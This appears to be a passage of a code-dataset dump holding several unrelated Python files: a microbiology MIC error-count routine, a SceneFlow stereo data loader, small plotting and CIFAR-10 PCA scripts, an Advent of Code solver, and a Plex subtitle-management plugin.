1\r\n\r\n\r\n #We now update the overall whole-dataset error counts. An error is any situation where\r\n #predicted != actual. 
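            #(Concretely, per check_is_error defined further below: actual 2
            #with predicted 0 is a 'very major' error, actual 0 with predicted
            #2 is 'major', and any pair involving category 1 is 'minor'.)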
Microbiologists define \"very major\", \"major\" and \"minor\" errors\r\n #depending on how predicted compares to actual (implemented in check_is_error below).\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n num_wrong_predictions += 1\r\n self.error_counts[error_code] += 1\r\n #We also check whether the e-test MIC was at least within twofold of the broth MIC. If so,\r\n #microbiologists consider it to be within \"essential agreement\" even if predicted\r\n #category is wrong. So they track both # errors and \"essential agreement\". (Yes, I know,\r\n #twofold is a huge error bar in most fields. It's what microbiologists use -- MIC assays\r\n #are not very precise.)\r\n if xvalue[i] <= micvalue[i]*2.0:\r\n if xvalue[i] >= micvalue[i]*0.5:\r\n num_predictions_within_twofold += 1\r\n \r\n #For MIC vs MIC data only, update the essential and categorical agreement attributes.\r\n self.essential_agreement = 100.0 * num_predictions_within_twofold / self.error_counts['num_strains']\r\n self.categorical_agreement = 100.0 - 100.0*num_wrong_predictions / self.error_counts['num_strains']\r\n \r\n\r\n\r\n\r\n #Very major error means predicted susceptible but actually resistant.\r\n #Major error means predicted resistant but actually susceptible.\r\n #Minor error means one of {predicted, actual} is intermediate\r\n #and the other is something else. This distinction comes down to the impact\r\n #a missed prediction would have on patient treatment. If you predict susceptible\r\n #but bug is resistant, for example, this is the worst thing that can happen, because\r\n #patient is being treated with a drug that won't help, so the infection will continue\r\n #to grow. Predicting resistant when actually susceptible is bad but not quite as bad --\r\n #just means the doctor will pass on what could actually have been a useful drug for that patient.\r\n def check_is_error(self, predicted_category, actual_category):\r\n if predicted_category != actual_category:\r\n if actual_category == 1 or predicted_category == 1:\r\n return 'minor errors'\r\n elif actual_category == 2 and predicted_category == 0:\r\n return 'very major errors'\r\n elif actual_category == 0 and predicted_category == 2:\r\n return 'major errors'\r\n else:\r\n return 'no error'\r\n","sub_path":"scripts/model_object.py","file_name":"model_object.py","file_ext":"py","file_size_in_byte":12567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488507863","text":"import os\nimport torch\nimport torch.utils.data as data\nimport torch\nimport torchvision.transforms as transforms\nimport random\nfrom PIL import Image, ImageOps\nfrom dataloader.preprocess import get_transform\nimport dataloader.readpfm as rp\nimport numpy as np\nimport json\n\nfilepath=os.path.dirname(__file__)\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\ndef default_loader(path):\n return Image.open(path).convert('RGB')\n\ndef disparity_loader(path):\n return rp.readPFM(path)\n\n\nclass myImageFloder(data.Dataset):\n def __init__(self, data_dir, training, easy_level=1.0, loader=default_loader, dploader= disparity_loader):\n\n self.metas = filepath + '/disp/SceneFlow/SceneFlow_meta.json'\n with open(self.metas, 'r') as f:\n self.metas = json.load(f)\n if training:\n left=self.metas['all_left_img']\n 
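            # (assumed layout of the meta JSON: parallel lists of left-image,
            # right-image and left-disparity paths that share an index)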
right=self.metas['all_right_img']\n left_disparity=self.metas['all_left_disp']\n else:\n left=self.metas['test_left_img']\n right=self.metas['test_right_img']\n left_disparity=self.metas['test_left_disp']\n\n self.data_dir=data_dir\n self.easy_level=easy_level\n self.left = left\n self.right = right\n self.disp_L = left_disparity\n self.loader = loader\n self.dploader = dploader\n self.training = training\n\n def __getitem__(self, index):\n left = self.data_dir+self.left[index]\n right = self.data_dir+self.right[index]\n disp_L= self.data_dir+self.disp_L[index]\n\n\n left_img = self.loader(left)\n right_img = self.loader(right)\n dataL, scaleL = self.dploader(disp_L)\n\n # dataL = np.ascontiguousarray(dataL,dtype=np.float32)\n dataL = Image.fromarray(dataL)\n\n\n\n if self.training:\n w, h = left_img.size\n size=(h,w)\n th, tw = 256, 512\n\n if self.easy_level>0.7:\n x1 = random.randint(0, w - tw)\n y1 = random.randint(0, h - th)\n\n left_img = left_img.crop((x1, y1, x1 + tw, y1 + th))\n right_img = right_img.crop((x1, y1, x1 + tw, y1 + th))\n dataL = dataL.crop((x1, y1, x1 + tw, y1 + th))\n\n processed = get_transform(input_size=left_img.size, target_size=(th, tw),\n easy_level=self.easy_level, augment=True)\n left_img = processed[0](left_img)\n left_img = processed[1](left_img)\n\n right_img = processed[0](right_img)\n right_img = processed[1](right_img)\n\n dataL = processed[0](dataL)\n dataL = np.ascontiguousarray(dataL, dtype=np.float32)\n dataL = torch.FloatTensor(dataL).unsqueeze(0)\n\n return dict(input=(left_img, right_img),target=dataL, size=size)\n else:\n w, h = left_img.size\n size = (h, w)\n left_img = left_img.crop((w-960, h-544, w, h))\n right_img = right_img.crop((w-960, h-544, w, h))\n dataL = np.ascontiguousarray(dataL, dtype=np.float32)\n\n processed = get_transform(augment=False)\n left_img = processed(left_img)\n right_img = processed(right_img)\n dataL = torch.FloatTensor(dataL).unsqueeze(0)\n\n return dict(input=(left_img, right_img), target=dataL, size=size, path=left.split('/')[-1])\n\n def __len__(self):\n # if self.training:\n # return len(self.left[:10000])\n # else:\n # return len(self.left)\n return len(self.left)\n","sub_path":"dataloader/SecenFlowLoader.py","file_name":"SecenFlowLoader.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514859930","text":"#!/user/bin/python3\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\n\n\ndef enter():\n\t# x = np.array([1.0, 2.0, 3.0])\n\n\tx = np.arange(0, 6, 0.1) # generate data from 0 to 6 in steps of 0.1\n\ty1 = np.sin(x)\n\ty2 = np.cos(x)\n\t# draw the figure\n\tplt.plot(x, y1, label=\"sin\")\n\tplt.plot(x, y2, linestyle=\"--\", label=\"cos\") # draw with a dashed line\n\tplt.xlabel(\"x\") # x-axis label\n\tplt.ylabel(\"y\") # y-axis label\n\tplt.title('sin & cos') # title\n\tplt.legend()\n\tplt.show()\n\n\nif __name__ == '__main__':\n\tenter()\n","sub_path":"newPythhon3/arrayTest.py","file_name":"arrayTest.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52336295","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[215]:\n\n\nimport numpy as np\nimport pickle\nfrom matplotlib import pyplot as plt\nimport matplotlib.cm as cm\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ndata1 = unpickle('cifar-10-batches-py/data_batch_1')\ndata2 = 
unpickle('cifar-10-batches-py/data_batch_2')\ndata3 = unpickle('cifar-10-batches-py/data_batch_3')\ndata4 = unpickle('cifar-10-batches-py/data_batch_4')\ndata5 = unpickle('cifar-10-batches-py/data_batch_5')\ndata = np.vstack((data1[b'data'],data2[b'data'],data3[b'data'],data4[b'data'],data5[b'data']))\nlabels = np.vstack((data1[b'labels'],data2[b'labels'],data3[b'labels'],data4[b'labels'],data5[b'labels']))\nlabels = labels.flatten()\n\n\n# conversion to greyscale\ndata = data/255;\ndata = 0.299 * data[:,:1024] + 0.587 * data[:,1024:2048] + 0.114 * data[:,2048:3072]\nprint(data.shape)\n\n\n# In[216]:\n\n\nindices = np.argsort(labels)\ndata = data[indices]\nlabels = labels[indices]\n\nmeans=[]\nfor i in range(0,50000,5000):\n means.append(np.mean(data[i:i+5000],axis=0))\nprint(np.matrix(means).shape)\nprint(means)\n\n\n# In[217]:\n\n\nclass_vectors = []\nfor i in range(0,50000,5000):\n values,vectors = np.linalg.eig(np.cov(data[i:i+5000].T))\n\n indices = np.argsort(values)\n indices = np.flip(indices)\n vectors = vectors[indices]\n values = values[indices]\n class_vectors.append(vectors[:,:20])\nprint(np.shape(class_vectors))\nprint(class_vectors)\n\n\n# In[218]:\n\n\nred_data = (np.matmul(data[0:5000],class_vectors[0]))\nprint(np.shape(red_data))\nfor i in range(1,10):\n red_data = np.vstack((red_data,np.dot(data[i*5000:(i+1)*5000],class_vectors[i])))\nprint(np.shape(red_data))\nplt.show()\n\n# In[219]:\n\n\nrec_data = (np.dot(red_data[0:5000],class_vectors[0].T))\nprint(np.shape(rec_data))\nfor i in range(1,10):\n rec_data = np.vstack((rec_data,np.dot(red_data[i*5000:(i+1)*5000],class_vectors[i].T)))\nprint(np.shape(rec_data))\n\n\ner_data = np.sqrt(np.sum(np.square(rec_data-data),axis=1))\nprint(er_data.shape)\nerrors = []\nfor i in range(10):\n errors.append(np.sum(er_data[i*5000:(i+1)*5000])/5000)\nplt.bar([i for i in range(len(errors))],errors)\nprint(errors)\n\n\n# In[220]:\n\n\nred_means=[np.mean(red_data[0:5000],axis=0)]\nfor i in range(5000,50000,5000):\n red_means.append(np.mean(red_data[i:i+5000],axis=0))\nprint(np.matrix(red_means).shape)\n\nsplit_red_data = np.split(red_data,10)\nprint(np.matrix(split_red_data[0]).shape)\n\nfor i in range(10):\n print(np.sum(np.square(split_red_data[i]-red_means[i])))\n\n\n# In[225]:\n\n\nfor i in range(10):\n for j in range(10):\n print(np.sqrt(np.sum(np.square(means[i]-means[j]))),end=\"\\t\")\n \n \n\n\n# In[222]:\n\n\nerrors = np.empty([10,10])\nfor i in range(10):\n for j in range(10):\n Eab = np.sum(np.square((means[i]+rec_data[j*5000:(j+1)*5000])-data[i*5000:(i+1)*5000]),axis=1)/1024 \n Eba = np.sum(np.square((means[j]+rec_data[i*5000:(i+1)*5000])-data[j*5000:(j+1)*5000]),axis=1)/1024\n errors[i][j]=(np.sum(Eab)+np.sum(Eba)/2)\nprint(errors)\n\n\n# In[223]:\n\n\nfor i in range(10):\n indices = np.argsort(errors[i])\n print(indices[0:4])\n\nplt.show()\n\n\n","sub_path":"HW_10/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522396749","text":"def readfile():\r\n lines=[]\r\n with open('input.txt') as f:\r\n for line in f:\r\n lines.append(line.strip().split('|'))\r\n return lines\r\noutput=[]\r\ndef part1():\r\n targets_found=0\r\n target_length = [2,3,4,7]\r\n lines=readfile()\r\n output_values= [line[-1].split(' ') for line in lines]\r\n for line in output_values:\r\n for number in line:\r\n if len(number) in target_length:\r\n targets_found+=1\r\n\r\n print(targets_found)\r\n\r\ndef get_top(one,seven):\r\n for 
char in seven:\r\n if char not in one:\r\n return char\r\n\r\ndef get_bottom_sides(input_lines):\r\n occurrences = {}\r\n for element in input_lines:\r\n for char in ['a','b','c','d','e','f','g']:\r\n if char in occurrences:\r\n occurrences[char] += element.count(char)\r\n else:\r\n occurrences[char] = element.count(char)\r\n for element in occurrences:\r\n if occurrences[element] == 9:\r\n bottom_right = element\r\n if occurrences[element] == 4:\r\n bottom_left = element\r\n return bottom_right,bottom_left\r\n\r\ndef get_top_left(input_lines):\r\n occurrences = {}\r\n for element in input_lines:\r\n for char in ['a','b','c','d','e','f','g']:\r\n if char in occurrences:\r\n occurrences[char] += element.count(char)\r\n else:\r\n occurrences[char] = element.count(char)\r\n for element in occurrences:\r\n if occurrences[element] == 6:\r\n return element\r\n\r\ndef get_top_right(input_lines,decode_dict):\r\n for line in input_lines:\r\n if len(line) == 2:\r\n for char in line:\r\n if char not in decode_dict.values():\r\n return char\r\n\r\ndef get_middle(input_lines,decode_dict):\r\n for line in input_lines:\r\n if len(line) == 4:\r\n for char in line:\r\n if char not in decode_dict.values():\r\n return char\r\n\r\ndef get_bottom(decode_dict):\r\n for char in ['a','b','c','d','e','f','g']:\r\n if char not in decode_dict.values():\r\n return char\r\n\r\ndef get_code_for_one(codes):\r\n return [code for code in codes if len(code) == 2]\r\n\r\ndef get_code_for_seven(codes):\r\n return [code for code in codes if len(code) == 3]\r\n\r\ndef decode_line(line):\r\n decoded = {}\r\n one_code = str(get_code_for_one(line))\r\n seven_code = str(get_code_for_seven(line))\r\n decoded['t'] = get_top(one_code,seven_code)\r\n decoded['br'],decoded['bl'] = get_bottom_sides(line)\r\n decoded['tl']=get_top_left(line)\r\n decoded['tr'] = get_top_right(line,decoded)\r\n decoded['m'] = get_middle(line,decoded)\r\n decoded['b'] = get_bottom(decoded)\r\n return decoded\r\n\r\ndef code_to_number(decoder):\r\n code_to_number = {}\r\n code_to_number['0'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['bl']+decoder['tl']\r\n code_to_number['1'] = decoder['tr']+decoder['br']\r\n code_to_number['2'] = decoder['t']+decoder['tr']+decoder['b']+decoder['bl']+decoder['m']\r\n code_to_number['3'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['m']\r\n code_to_number['4'] = decoder['tr']+decoder['br']+decoder['tl']+decoder['m']\r\n code_to_number['5'] = decoder['t']+decoder['br']+decoder['b']+decoder['tl']+decoder['m']\r\n code_to_number['6'] = decoder['t']+decoder['br']+decoder['b']+decoder['bl']+decoder['tl']+decoder['m']\r\n code_to_number['7'] = decoder['t']+decoder['tr']+decoder['br']\r\n code_to_number['8'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['bl']+decoder['tl']+decoder['m']\r\n code_to_number['9'] = decoder['t']+decoder['tr']+decoder['br']+decoder['b']+decoder['tl']+decoder['m']\r\n return code_to_number\r\n\r\ndef strings_equal(decoder, code):\r\n for char in code:\r\n if char not in decoder:\r\n return False\r\n for char in decoder:\r\n if char not in code:\r\n return False\r\n return True\r\n\r\n## t,tr,br,b,bl,tl,m\r\n## a,b,c,d,e,f,g\r\ndef part2():\r\n lines=readfile()\r\n output_answer=[]\r\n input_codes = [line[0].split(' ')[:-1] for line in lines]\r\n output_codes = [line[1].split(' ')[1:] for line in lines]\r\n for x in range(len(input_codes)):\r\n decoded_output =[]\r\n decoded_line = decode_line(input_codes[x])\r\n 
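        # decoded_line maps segment positions ('t', 'tr', 'br', ...) to the
        # scrambled wire letters; code_to_number() below then rebuilds the
        # letter string that lights up each digit 0-9 for this entry.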
decoder=code_to_number(decoded_line)\r\n for code in output_codes[x]:\r\n for number in range(0,10):\r\n if strings_equal(decoder[str(number)],code) == True:\r\n decoded_output.append(str(number))\r\n output_string = ''\r\n for element in decoded_output:\r\n output_string += element\r\n output_answer.append(int(output_string))\r\n print(sum(output_answer))\r\npart1()\r\npart2()\r\n\r\n","sub_path":"2021/vetle/day8/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447466495","text":"######################################################################################################################\n#\t\t\t\t\tWebTools bundle for Plex\n#\n#\t\t\t\t\tAllows you to manipulate subtitles on Plex Media Server\n#\n#\t\t\t\t\tAuthor:\t\t\tdagaluf, a Plex Community member\n#\t\t\t\t\tAuthor:\t\t\tdane22, a Plex Community member\n#\n#\t\t\t\t\tSupport thread:\thttps://forums.plex.tv/index.php/topic/119940-webtool-subtitle-manager-development/\n#\n######################################################################################################################\n\n#********* Constants used **********\nPREFIX = '/utils/webtools'\nNAME = 'WebTools'\nICON = 'WebTools.png'\nMYSECRET = 'BarkleyIsAFineDog'\nERRORAUTH = 'Error authenticating'\nMYTOKEN = ''\n\n#********** Imports needed *********\nimport os, io\nfrom subprocess import call\nimport xml.etree.ElementTree as et\n\n#********** Initialize *********\ndef Start():\n\tPLUGIN_VERSION = getPref('Version')\t\n\tprint(\"******** Started %s on %s **********\" %(NAME + ' V' + PLUGIN_VERSION, Platform.OS))\n\tLog.Debug(\"******* Started %s on %s ***********\" %(NAME + ' V' + PLUGIN_VERSION, Platform.OS))\n\tHTTP.CacheTime = 0\n\tDirectoryObject.thumb = R(ICON)\n\tObjectContainer.title1 = NAME + ' V' + PLUGIN_VERSION \n\tPlugin.AddViewGroup('List', viewMode='List', mediaType='items')\n\tObjectContainer.view_group = 'List'\n\tValidatePrefs()\n\n#********** Get token *********\n''' This will get a valid token, that can be added to the url, if authenticating is needed '''\n@route(PREFIX + '/getToken')\ndef getToken():\n\tLog.Debug('getToken started')\n\t# Grap the token from Plex\n\tmyURL = 'http://127.0.0.1:32400/myplex/account'\n\ttry:\t\t\n\t\tmyXML = XML.ElementFromURL(myURL).xpath('//MyPlex')\n\texcept:\n\t\treturn 'NoAccess'\n\ttry:\n\t\treturnValue = ''\n\t\tmyToken = myXML[0].get('authToken')\n\t\treturnValue = 'X-Plex-Token=' + myToken\n\texcept:\n\t\tLog.Debug('No token avail')\n\treturn returnValue\n\n\n#********** Get Pref *********\n''' This will get a value from a Pref setting in the settings file '''\n@route(PREFIX + '/getPref')\ndef getPref(key):\n\tLog.Debug('getPref called for key: %s' %(key))\n\tmyFile = os.path.join(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http', 'jscript', 'settings.js')\n\twith io.open(myFile) as fin:\n\t\tfor line in fin:\n\t\t\tif 'var ' + key + ' =' in line:\n\t\t\t\tdrop, value = line.split('= \"')\n\t\t\t\tvalue = value[:-3]\n\treturn value\n\n#********** Set Secret *********\n''' This will save a unique GUID in the dict, that is used as a seed for the secret '''\n@route(PREFIX + '/setSecretGUID')\ndef setSecretGUID():\n\tDict['secret'] = String.UUID()\n\tDict.Save()\n\treturn\n\n#********** Create Website *********\n''' Create symbolic links in the WebClient, so we can access this bundle frontend via a browser directly '''\n@route(PREFIX + '/setup')\ndef setupSymbLink():\n\tsrc = 
Core.storage.join_path(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http')\n\tdst = Core.storage.join_path(Core.app_support_path, 'Plug-ins', 'WebClient.bundle', 'Contents', 'Resources', NAME)\n\tif not os.path.lexists(dst):\n\t\tif Platform.OS=='Windows':\n\t\t\tLog.Debug('Darn ' + Platform.OS)\n\t\t\t# Cant create a symb link on Windows, until Plex moves to Python 3.3\n\t\t\t#call([\"C:\\Users\\TM\\AppData\\Local\\Plex Media Server\\Plug-ins\\WebTools.bundle\\RightClick_Me_And_Select_Run_As_Administrator.cmd\"])\n\t\t\treturn False\n\t\telse:\n\t\t# This creates a symbolic link for the bundle in the WebClient.\n\t\t# URL is http://:32400/web/WebTools/index.html\n\t\t\tos.symlink(src, dst)\n\t\t\tLog.Debug(\"SymbLink not there, so creating %s pointing towards %s\" %(dst, src))\n\t\t\treturn True\n\telse:\n\t\tLog.Debug(\"SymbLink already present\")\n\t\treturn True\n\n#********** Main function *********\n''' Main menu '''\n@handler(PREFIX, NAME, ICON)\n@route(PREFIX + '/MainMenu')\ndef MainMenu(Func='', Secret='', **kwargs):\n\tif Func=='':\n\t\tLog.Debug(\"********** Starting MainMenu **********\")\t\n\t\toc = ObjectContainer()\n\t\tif not setupSymbLink():\n\t\t\tcmdFileName = Core.storage.join_path(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'RightClick_Me_And_Select_Run_As_Administrator.cmd')\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"You are running Plex on a Windows OS, but\"))\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title='have not yet been running the file named:'))\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=cmdFileName))\n\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title='Do so, and then reload this page'))\n\t\telse:\n\t\t\tif setPMSPath():\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"To access this channel, go to\"))\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title='http://' + Prefs['PMS_Path'] + ':32400/web/' + NAME + '/index.html'))\n\t\t\telse:\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"Bad or missing settings\"))\t\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"Select Preferences to set ip address of the PMS\"))\n\t\t\t\toc.add(DirectoryObject(key=Callback(MainMenu), title=\"Afterwards, refresh this page\"))\n\t\toc.add(PrefsObject(title='Preferences', thumb=R('icon-prefs.png')))\n\t\tLog.Debug(\"********** Ending MainMenu **********\")\n\t\treturn oc\n\t# Here comes the functions avail\n\telif Func=='PathExists':\n\t\treturn PathExists(Secret, kwargs.get(\"Path\"))\n\telif Func=='ShowSRT':\n\t\treturn ShowSRT(Secret, kwargs.get(\"FileName\"))\n\telif Func=='DelSub':\n\t\treturn DelSub(Secret, kwargs.get(\"MediaID\"), kwargs.get(\"SubFileID\"))\n\telif Func=='GetXMLFile':\n\t\treturn GetXMLFile(Secret, kwargs.get(\"Path\"))\n\telif Func=='SetPref':\n\t\treturn SetPref(Secret, kwargs.get(\"Pref\"), kwargs.get(\"Value\"))\n\telif Func=='GetXMLFileFromUrl':\n\t\treturn GetXMLFileFromUrl(Secret, kwargs.get(\"Url\"))\n\telif Func=='restart':\n\t\treturn Restart()\n\n\n####################################################################################################\n# Set PMS Path\n####################################################################################################\n@route(PREFIX + '/setPMSPath')\ndef setPMSPath():\n\tLog.Debug('Entering setPMSPath')\n\t# Let's check if the PMS path is valid\n\tmyPath = Prefs['PMS_Path']\n\tLog.Debug('My master set the Export path to: %s' %(myPath))\n\ttry:\n\t\t#Let's see if we can 
add out subdirectory below this\n\t\tif MYTOKEN != None:\n\t\t\ttmpTest = XML.ElementFromURL('http://' + myPath + ':32400/?' + MYTOKEN)\n\t\telse:\n\t\t\ttmpTest = XML.ElementFromURL('http://' + myPath + ':32400')\n\t\treturn True\t\t\n\texcept:\n\t\tLog.Critical('Bad pmsPath')\n\t\treturn False\n\t\n####################################################################################################\n# ValidatePrefs\n####################################################################################################\n@route(PREFIX + '/ValidatePrefs')\ndef ValidatePrefs():\n\tglobal MYTOKEN\n\tMYTOKEN = getToken()\n\tsetupSymbLink()\n\tsetSecretGUID()\n\tSetPref(Dict['secret'], 'PathToPlexMediaFolder', Core.app_support_path.replace(\"\\\\\", \"/\"))\n\tif setPMSPath():\n\t\tLog.Debug('Prefs are valid, so lets update the js file')\n\t\tmyFile = os.path.join(Core.app_support_path, 'Plug-ins', NAME + '.bundle', 'http', 'jscript', 'settings.js')\n\t\tglobal MYSECRET \n\t\tMYSECRET = Hash.MD5(Dict['secret'] + Prefs['PMS_Path'])\n\t\twith io.open(myFile) as fin, io.open(myFile + '.tmp', 'w') as fout:\n\t\t\tfor line in fin:\n\t\t\t\tif 'var Secret =' in line:\n\t\t\t\t\tline = 'var Secret = \"' + MYSECRET + '\";\\n'\n\t\t\t\telif 'var PMSUrl =' in line:\n\t\t\t\t\tline = 'var PMSUrl = \"' + Prefs['PMS_Path'] + '\";\\n'\n\t\t\t\telif 'var Token =' in line:\n\t\t\t\t\tline = 'var Token = \"' + MYTOKEN + '\";\\n' \t\t\t\t\t\n\t\t\t\tfout.write(unicode(line))\n\t\tos.rename(myFile, myFile + '.org')\n\t\tos.rename(myFile + '.tmp', myFile)\n\treturn\n\n####################################################################################################\n# Check Secret\n####################################################################################################\n''' Check if the Secret provided is valid\nReturns true is okay, and else false '''\n@route(PREFIX + '/PwdOK')\ndef PwdOK(Secret):\n\tif (Hash.MD5(Dict['secret'] + Prefs['PMS_Path']) == Secret):\n\t\treturn True\n\telif Secret == Dict['secret']:\n\t\treturn True\t\t\n\telse:\n\t\treturn False\n\n####################################################################################################\n# Check if a path exists\n####################################################################################################\n''' Check if a path exists.\tReturns true if if it does, else false '''\n@route(PREFIX + '/PathExists')\ndef PathExists(Secret, Path):\n\tif PwdOK(Secret):\t\t\n\t\t# Now we got the filename and dir name, so let's nuke the file\n\t\tif os.path.exists(Path):\n\t\t\tLog.Debug('Got a call for PathExists with the secret of %s and the path as %s and returned true' %(Secret, Path))\n\t\t\treturn 'true'\n\t\telse:\n\t\t\tLog.Debug('Got a call for PathExists with the secret of %s and the path as %s and returned false' %(Secret, Path))\n\t\t\treturn 'false'\t\t\t\t\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Store a pref setting\n####################################################################################################\n''' Allows webpart to store a setting in settings.js '''\n@route(PREFIX + '/SetPref')\ndef SetPref(Secret, Pref, Value):\n\tif PwdOK(Secret):\t\t\n\t\tLog.Debug('Got a call to set %s to %s in settings.js' %(Pref, Value))\n\t\tValue = Value.replace(\"\\\\\", \"/\")\n\t\tLog.Debug('Value is now %s' %(Value))\n\t\ttry:\n\t\t\tbDone = False\n\t\t\tmyFile = os.path.join(Core.app_support_path, 'Plug-ins', NAME + 
'.bundle', 'http', 'jscript', 'settings.js')\n\t\t\twith io.open(myFile) as fin, io.open(myFile + '.tmp', 'w') as fout:\n\t\t\t\tfor line in fin:\n\t\t\t\t\tif 'var ' + Pref + ' = ' in line:\n\t\t\t\t\t\tline = 'var ' + Pref + ' = \"' + Value + '\";\\n'\n\t\t\t\t\t\tbDone = True\n\t\t\t\t\tfout.write(unicode(line))\n\t\t\tif bDone == False:\n\t\t\t\twith io.open(myFile + '.tmp', 'a') as fout:\n\t\t\t\t\tline = 'var ' + Pref + ' = \"' + Value + '\";\\n'\n\t\t\t\t\tfout.write(unicode(line))\n\t\t\tos.rename(myFile, myFile + '.org')\n\t\t\tos.rename(myFile + '.tmp', myFile)\n\t\t\treturn 'ok'\n\t\texcept:\n\t\t\treturn 'error'\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Show contents of a txt file\n####################################################################################################\n''' Show contents of a txt file '''\n@route(PREFIX + '/ShowSRT')\ndef ShowSRT(Secret, FileName):\n\tif PwdOK(Secret):\n\t\twith io.open (FileName, \"rb\") as myfile:\t\t\n\t\t\treturn myfile.read()\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Delete a subtitle file\n####################################################################################################\n''' Delete a subtitle file.\tReturns ok if all goes well '''\n@route(PREFIX + '/DelSub')\ndef DelSub(Secret, MediaID, SubFileID):\n\tif PwdOK(Secret):\t\t\n\t\t# Now we got the filename and dir name, so let's nuke the file\n\t\ttry:\t\t\t\n\t\t\tLog.Debug('***** Trying to delete the Sub file %s from the media %s *****' %(SubFileID, MediaID))\n\t\t\tmyFiles = []\n\t\t\t# Let's start by grapping the media info from it's tree\n\t\t\tmyURL = 'http://127.0.0.1:32400/library/metadata/' + MediaID + '/tree'\t\t\t\n\t\t\tmyMediaStreams = XML.ElementFromURL(myURL).xpath('//MediaPart/MediaStream')\n\t\t\t# We got a collection of MediaParts, so start walking them\n\t\t\tfor myMediaStream in myMediaStreams:\n\t\t\t\tif myMediaStream.get('id') == SubFileID:\n\t\t\t\t\t# We got the correct sub file\n\t\t\t\t\tmySub = myMediaStream.get('url')\n\t\t\t\t\tLog.Debug('Sub file found is %s' %(mySub))\n\t\t\t\t\t# Okay....Got the agent, now let's find the path to the bundle/contents directory\n\t\t\t\t\tmyHash = XML.ElementFromURL(myURL).xpath('//MediaPart/@hash')[0]\n\t\t\t\t\t# Create a string containing the path to the contents directory\n\t\t\t\t\tmyPath = os.path.join(Core.app_support_path, 'Media', 'localhost', myHash[0], myHash[1:]+ '.bundle', 'Contents')\n\t\t\t\t\tif 'media://' in mySub:\n\t\t\t\t\t\t# Let's find the agent in spe, and start by getting LangCode/Agent\n\t\t\t\t\t\timport re\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tmyAgent = re.search('Contents/Subtitles/(.*)', mySub).group(1)\t\t\t\t\t\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tLog.Debug('Error digesting string %s' %(mySub))\t\t\n\t\t\t\t\t\t# Now seperate the lang code\n\t\t\t\t\t\tlang, myAgent = myAgent.split(\"/\")\n\t\t\t\t\t\t# Let's get the filename\n\t\t\t\t\t\tmySubFile = myAgent\t\t\t\t\t\t\t\n\t\t\t\t\t\trealAgentName, realSubFile = myAgent.split('_')\n\t\t\t\t\t\t# The result for the subtitles contribution folder\t\t\t\t\t\t\n\t\t\t\t\t\trealSubPathForSubCont = os.path.join(myPath, 'Subtitle Contributions', realAgentName, lang, realSubFile)\n\t\t\t\t\t\t# The result for the Symbolic links\n\t\t\t\t\t\trealPathForSymbLink = os.path.join(myPath, 'Subtitles', lang, myAgent)\n\t\t\t\t\t\t# Add to array of 
files to delete\n\t\t\t\t\t\tmyFiles.append(realSubPathForSubCont)\n\t\t\t\t\t\tmyFiles.append(realPathForSymbLink)\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\trealAgentName = 'com.plexapp.agents.localmedia'\n\t\t\t\t\t\tmySubFile = mySub[7:]\n\t\t\t\t\t\tmyFiles.append(mySubFile)\n\t\t\t\t\tfor myFile in myFiles:\n\t\t\t\t\t\tLog.Debug('Delete %s' %(myFile))\n\t\t\t\t\t\tos.remove(myFile)\t\t\t\t\t\t\n\t\t\t\t\t# XML files that we need to manipulate\n\t\t\t\t\txmlFile1 = os.path.join(myPath, 'Subtitles.xml')\n\t\t\t\t\txmlFile2 = os.path.join(myPath, 'Subtitle Contributions', realAgentName + '.xml')\n\t\t\t\t\tif (realAgentName!='com.plexapp.agents.localmedia'):\n\t\t\t\t\t\tDelFromXML(xmlFile2, 'media', realSubFile)\n\t\t\t\t\t\tDelFromXML(xmlFile1, 'media', realSubFile)\n\t\t\t\t\telse:\n\t\t\t\t\t\tDelFromXML(xmlFile2, 'file', mySubFile)\n\t\t\t\t\t\tDelFromXML(xmlFile1, 'file', mySubFile)\n\t\t\t\t\tbreak\n\t\t\tLog.Debug('***** DelSub ended okay *****')\n\t\t\treturn 'ok'\t\t\t\t\n\t\texcept OSError:\n\t\t\treturn 'error'\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Delete from an XML file\n####################################################################################################\n''' Delete from an XML file 